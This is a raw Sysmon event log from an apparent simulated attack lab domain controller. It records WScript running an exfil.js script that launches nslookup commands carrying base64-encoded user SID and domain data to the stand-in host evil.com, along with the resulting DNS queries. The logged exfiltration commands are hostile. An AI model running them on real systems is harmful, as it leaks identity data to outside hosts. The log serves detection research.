C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-BB45-000000005F02}4536C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliqruh.tmp 2>&1 10341000x8000000000000000214082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.901{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-BC45-000000005F02}6244C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.901{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-BC45-000000005F02}6244C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000214080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.856{00000000-0000-0000-0000-000000000000}4712evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.755{00000000-0000-0000-0000-000000000000}7080evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.659{00000000-0000-0000-0000-000000000000}7232evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.532{00000000-0000-0000-0000-000000000000}6024evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.421{00000000-0000-0000-0000-000000000000}7368evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.339{00000000-0000-0000-0000-000000000000}4552evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.261{00000000-0000-0000-0000-000000000000}5124evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.187{00000000-0000-0000-0000-000000000000}4040evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000214072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.897{2E1864BB-18FA-629A-BC45-000000005F02}62444156C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-BB45-000000005F02}4536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000214071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.095{00000000-0000-0000-0000-000000000000}6160evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.992{00000000-0000-0000-0000-000000000000}6984evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.904{00000000-0000-0000-0000-000000000000}1220evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000214068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.880{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-BC45-000000005F02}6244C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.863{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.863{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-BB45-000000005F02}4536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.863{2E1864BB-18E0-629A-6742-000000005F02}39766216C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-BB45-000000005F02}4536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.877{2E1864BB-18FA-629A-BB45-000000005F02}4536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliqruh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.863{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyep.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.848{2E1864BB-18FA-629A-B945-000000005F02}67124632C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-BA45-000000005F02}6388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.848{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.832{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.832{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.832{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.832{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-BA45-000000005F02}6388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.832{2E1864BB-18FA-629A-B845-000000005F02}42483548C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-BA45-000000005F02}6388C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.846{2E1864BB-18FA-629A-BA45-000000005F02}6388C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-B845-000000005F02}4248C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyep.tmp 2>&1 10341000x8000000000000000214051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.801{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-B945-000000005F02}6712C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.801{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-B945-000000005F02}6712C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.798{2E1864BB-18FA-629A-B945-000000005F02}67124632C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-B845-000000005F02}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.777{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B945-000000005F02}6712C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.777{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B845-000000005F02}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.777{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.777{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.777{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 